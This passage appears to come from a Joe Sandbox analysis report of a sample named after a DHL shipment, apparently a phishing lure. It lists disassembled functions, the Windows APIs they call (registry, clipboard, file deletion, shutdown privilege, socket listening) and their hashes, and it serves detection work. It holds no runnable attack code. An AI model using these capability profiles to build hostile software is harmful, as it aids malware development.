                                                                                        • Opcode ID: 00fe1018c3a25b4598d35930d9d2139dbf8d87b6daac1f5c2ccaf697f7e75f5b
                                                                                        • Instruction ID: ba5e395e09c3e130992ccf9b81880cb9f957a178ed2664d669573cc1996089c6
                                                                                        • Opcode Fuzzy Hash: 00fe1018c3a25b4598d35930d9d2139dbf8d87b6daac1f5c2ccaf697f7e75f5b
                                                                                        • Instruction Fuzzy Hash: CF51D93090478829FB35DBA088957EFBFB49F12380F18459ED9D2665C3DAA49B8CC761
                                                                                        Function 00C803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C804AC
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C8054B
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C805E3
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C80822
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C8082F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: 6a78561eff0a839d51488291060d9ac248187b8e3eeae13115bc01c2973dd9f4
                                                                                        • Instruction ID: 84617fdeee239cf12ee0984dc50b8a6733a5a6e9d45b9b64a5e44ec31b016a4d
                                                                                        • Opcode Fuzzy Hash: 6a78561eff0a839d51488291060d9ac248187b8e3eeae13115bc01c2973dd9f4
                                                                                        • Instruction Fuzzy Hash: B8E16F71604200AFCB54EF24C891E2ABBE4FF89314F14856DF85ADB2A2DB30ED45DB95
                                                                                        Function 00C74164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: 387d3e0423a26030e111f682dfaeb5e278f899a7a6ac67813cb90a23128ae30d
                                                                                        • Instruction ID: 92874dc3f818031ff4fe2fea9429882e39f1d6da7edd14884ed9f913a1574c8a
                                                                                        • Opcode Fuzzy Hash: 387d3e0423a26030e111f682dfaeb5e278f899a7a6ac67813cb90a23128ae30d
                                                                                        • Instruction Fuzzy Hash: A221B2752002109FDB14AF64EC19B6D7BA8FF04711F11C129F94ADB2A2DB30AD41CB58
                                                                                        Function 00C637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                          • Part of subcall function 00C64A31: GetFileAttributesW.KERNEL32(?,00C6370B), ref: 00C64A32
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C638A3
                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C6394B
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00C6395E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C6397B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6399D
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C639B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 4002782344-1173974218
                                                                                        • Opcode ID: da7a744d7c47e5a9d015aca376f56d96b3357d29d641be0b964cabb4a3580647
                                                                                        • Instruction ID: a841ba953dd843ec675bcd9f2306764cbb9c373bad0e8c5fc2cc98bfa4f6455a
                                                                                        • Opcode Fuzzy Hash: da7a744d7c47e5a9d015aca376f56d96b3357d29d641be0b964cabb4a3580647
                                                                                        • Instruction Fuzzy Hash: B0517F3180518DAACF19EBA0D9929EEB779AF14304F600169F416B71D2EF316F09EF60
                                                                                        Function 00C6F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C6F440
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00C6F470
                                                                                        • _wcscmp.LIBCMT ref: 00C6F484
                                                                                        • _wcscmp.LIBCMT ref: 00C6F49F
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 00C6F53D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F553
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                        • String ID: *.*
                                                                                        • API String ID: 713712311-438819550
                                                                                        • Opcode ID: 9dc703db0770162155b183875b5cfb2c5fd86256d803a1969d9d2c5c032e2d85
                                                                                        • Instruction ID: 86e3a2fed64b39bdd3ec16f9909f216ef9e16652e235e76950c7284e19a73d2e
                                                                                        • Opcode Fuzzy Hash: 9dc703db0770162155b183875b5cfb2c5fd86256d803a1969d9d2c5c032e2d85
                                                                                        • Instruction Fuzzy Hash: F5417E71904219AFDF24EF64DC85AEEBBB4FF05314F10456AE815A3190EB309E46DF50
                                                                                        Function 00C15760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 51610d5ace6e0e1bc12a34cdaaa08d140b3562d88b6808e357005c2be545507e
                                                                                        • Instruction ID: 1f348d7224447ceab68d08cd5bdd32a9c95da55f1169a9fe819b174c397ee0d1
                                                                                        • Opcode Fuzzy Hash: 51610d5ace6e0e1bc12a34cdaaa08d140b3562d88b6808e357005c2be545507e
                                                                                        • Instruction Fuzzy Hash: 9212AB70A00609DFDF04DFA5D981AEEB3F5FF88300F204529E846E7290EB36A995DB55
                                                                                        Function 00C63B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                          • Part of subcall function 00C64A31: GetFileAttributesW.KERNEL32(?,00C6370B), ref: 00C64A32
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C63B89
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C63BD9
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C63BEA
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C63C01
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C63C0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2649000838-1173974218
                                                                                        • Opcode ID: ee16165825407688bf324e0bb635b2fc565685de6dbf053254766db502988b26
                                                                                        • Instruction ID: ec4d98bf19e062fd465e66af03b6813552bcf7c2ca9adaacf9d9c34df498b129
                                                                                        • Opcode Fuzzy Hash: ee16165825407688bf324e0bb635b2fc565685de6dbf053254766db502988b26
                                                                                        • Instruction Fuzzy Hash: 9731AF31008384AFC715EF64C8919AFB7E8BE91304F404E2DF4E5921E1EB21EA09DB67
                                                                                        Function 00C651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5882B
                                                                                          • Part of subcall function 00C587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C58858
                                                                                          • Part of subcall function 00C587E1: GetLastError.KERNEL32 ref: 00C58865
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00C651F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: 9039f07f8b21f025f54fafd1ac93b649df72bd0992fb8cf351f5f9df6249db3f
                                                                                        • Instruction ID: 7d31342b722022484484471808a758aa0ae78de5369137eb1d57c91844ea5ad6
                                                                                        • Opcode Fuzzy Hash: 9039f07f8b21f025f54fafd1ac93b649df72bd0992fb8cf351f5f9df6249db3f
                                                                                        • Instruction Fuzzy Hash: A001F2357A56116BF7386268ACEAFBB7358EB05341F300425FE23E20D2DA611D4586A4
                                                                                        Function 00C76283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C762DC
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C762EB
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C76307
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00C76316
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C76330
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00C76344
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 2d9bcdde1ae62aa571d4a9c822acad99317e647f68ccb1be3a3ec89b7aeff958
                                                                                        • Instruction ID: 93116145136e044e94df8d002af0d34110cd68ac3a47386f62e40520057547bd
                                                                                        • Opcode Fuzzy Hash: 2d9bcdde1ae62aa571d4a9c822acad99317e647f68ccb1be3a3ec89b7aeff958
                                                                                        • Instruction Fuzzy Hash: E521EF746006049FDB10EF64C845B7EBBA9EF49320F14C268F86AA73E2CB70AD01DB51
                                                                                        Function 00C15520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                        • _memmove.LIBCMT ref: 00C50258
                                                                                        • _memmove.LIBCMT ref: 00C5036D
                                                                                        • _memmove.LIBCMT ref: 00C50414
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1300846289-0
                                                                                        • Opcode ID: b1707c8fb79185f765d62513c8bcdf155331f510f812cde18e7890b3adb3840c
                                                                                        • Instruction ID: 222261a215cbf2740f8f639fac73af71b39f32f4a23109914ba7b6cd96571acf
                                                                                        • Opcode Fuzzy Hash: b1707c8fb79185f765d62513c8bcdf155331f510f812cde18e7890b3adb3840c
                                                                                        • Instruction Fuzzy Hash: 4C02C170A00609DFCF04DF64D981AAEBBB5FF84300F248069E806DB395EB35DA95DB95
                                                                                        Function 00C01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C019FA
                                                                                        • GetSysColor.USER32(0000000F), ref: 00C01A4E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00C01A61
                                                                                          • Part of subcall function 00C01290: DefDlgProcW.USER32(?,00000020,?), ref: 00C012D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorProc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3744519093-0
                                                                                        • Opcode ID: f52ccb1ebb3820176a762e1be07f56440e39b1d9ceb76ae1d9f85bbc38e7c12b
                                                                                        • Instruction ID: b71ae6430167ad960ec9f6995b685213bd0016711b0ba7a5cccaca9f1f8ffbe1
                                                                                        • Opcode Fuzzy Hash: f52ccb1ebb3820176a762e1be07f56440e39b1d9ceb76ae1d9f85bbc38e7c12b
                                                                                        • Instruction Fuzzy Hash: 14A15870222554BEEB29AB6A8C88F7FB55CDF41345F1C0119FE12D21D2CA219E41F3B5
                                                                                        Function 00C76747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C77DB6
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C7679E
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C767C7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C76800
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C7680D
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00C76821
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 99427753-0
                                                                                        • Opcode ID: 799c020394c9f70d03a7c14adc36db8a29641999fd98648d5096cff36438acec
                                                                                        • Instruction ID: 1b8cccaee7f4050bfd88f6470904003db987ef070be91cf1f44c7047c38f6d8c
                                                                                        • Opcode Fuzzy Hash: 799c020394c9f70d03a7c14adc36db8a29641999fd98648d5096cff36438acec
                                                                                        • Instruction Fuzzy Hash: FD41D175A00600AFEB10AF248C86F6E77A8DF49724F44C55CFA5AAB3C3CA709D01D791
                                                                                        Function 00C85376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 5a6b6361302fbcf6729d5776c629d1e254e5da8f29d2d0b149c862d6d85b5ec1
                                                                                        • Instruction ID: 659ecd4675fd3a91d5da2bc1518327c74b1d11fc2cc87488ebd63b4ea22b4ab8
                                                                                        • Opcode Fuzzy Hash: 5a6b6361302fbcf6729d5776c629d1e254e5da8f29d2d0b149c862d6d85b5ec1
                                                                                        • Instruction Fuzzy Hash: 9A11B231700911ABEB216F269C44B6EBB99EF847A5B404438F846D3291DBB09D02C7A8
                                                                                        Function 00C580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C580C0
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C580CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C580D9
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C580E0
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C580F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 0700f847ab7265316bb425c67b7ab87187f2dad47b5980a2d265a51ede6c5d52
                                                                                        • Instruction ID: df86014bd4e19a6767765c0003c47de593378ff35fb45bf0b519d322950c8ec8
                                                                                        • Opcode Fuzzy Hash: 0700f847ab7265316bb425c67b7ab87187f2dad47b5980a2d265a51ede6c5d52
                                                                                        • Instruction Fuzzy Hash: 8AF06235240304EFEB104FA5EC8DF6F3BACEF4A755B100029F945D6150DB619D4AEB64
                                                                                        Function 00C6C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C6C432
                                                                                        • CoCreateInstance.OLE32(00C92D6C,00000000,00000001,00C92BDC,?), ref: 00C6C44A
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • CoUninitialize.OLE32 ref: 00C6C6B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2683427295-24824748
                                                                                        • Opcode ID: 840341b12cbb30ccc14437b310032e96ab1be4e90793063381afc9eeb2a0428c
                                                                                        • Instruction ID: a3d3d1079ba70ac1145232f5df9f63778b29633e647975b92a950f898616ab80
                                                                                        • Opcode Fuzzy Hash: 840341b12cbb30ccc14437b310032e96ab1be4e90793063381afc9eeb2a0428c
                                                                                        • Instruction Fuzzy Hash: A0A11AB1104205AFD700EF54C881EAFB7E8EF95354F004A2DF595972E2EB71EA49CB62
